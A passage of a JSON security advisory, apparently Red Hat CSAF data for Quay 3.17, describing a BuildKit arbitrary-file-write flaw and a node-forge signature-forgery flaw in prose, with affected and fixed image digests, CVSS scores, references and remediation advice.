          "text": "A flaw was found in BuildKit, a toolkit for converting source code to build artifacts. An untrusted BuildKit frontend can be leveraged to craft a malicious API message, allowing files to be written outside of the designated BuildKit state directory. This vulnerability, which is a form of arbitrary file write, could enable an attacker to execute unauthorized code or escalate their privileges on the system. This issue arises when custom BuildKit frontends are used with specific configuration options.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "BuildKit: github.com/moby/buildkit: BuildKit: Arbitrary file write and code execution via untrusted frontend",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-33747"
        },
        {
          "category": "external",
          "summary": "RHBZ#2452076",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2452076"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-33747",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-33747"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-33747",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33747"
        },
        {
          "category": "external",
          "summary": "https://github.com/moby/buildkit/releases/tag/v0.28.1",
          "url": "https://github.com/moby/buildkit/releases/tag/v0.28.1"
        },
        {
          "category": "external",
          "summary": "https://github.com/moby/buildkit/security/advisories/GHSA-4c29-8rgm-jvjj",
          "url": "https://github.com/moby/buildkit/security/advisories/GHSA-4c29-8rgm-jvjj"
        }
      ],
      "release_date": "2026-03-27T00:49:06.165000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-02T13:10:36+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:22465"
        },
        {
          "category": "workaround",
          "details": "To mitigate this vulnerability, avoid using untrusted BuildKit frontends. Restrict the use of custom BuildKit frontends to only those from verified and trusted sources. Do not specify untrusted frontends via `#syntax` or `--build-arg BUILDKIT_SYNTAX`.",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 8.2,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Moderate"
        }
      ],
      "title": "BuildKit: github.com/moby/buildkit: BuildKit: Arbitrary file write and code execution via untrusted frontend"
    },
    {
      "cve": "CVE-2026-33894",
      "cwe": {
        "id": "CWE-347",
        "name": "Improper Verification of Cryptographic Signature"
      },
      "discovery_date": "2026-03-27T21:02:52.462999+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2452464"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Forge (also called `node-forge`), a JavaScript implementation of Transport Layer Security. A remote attacker could exploit weaknesses in the RSASSA PKCS#1 v1.5 signature verification process. By crafting malicious signatures that include extra data within the ASN structure and do not meet padding requirements, an attacker can bypass signature validation. This allows for the creation of forged signatures that appear legitimate, potentially compromising the integrity and authenticity of communications.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "node-forge: Forge: Signature Forgery via Weak RSASSA PKCS#1 v1.5 Verification",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
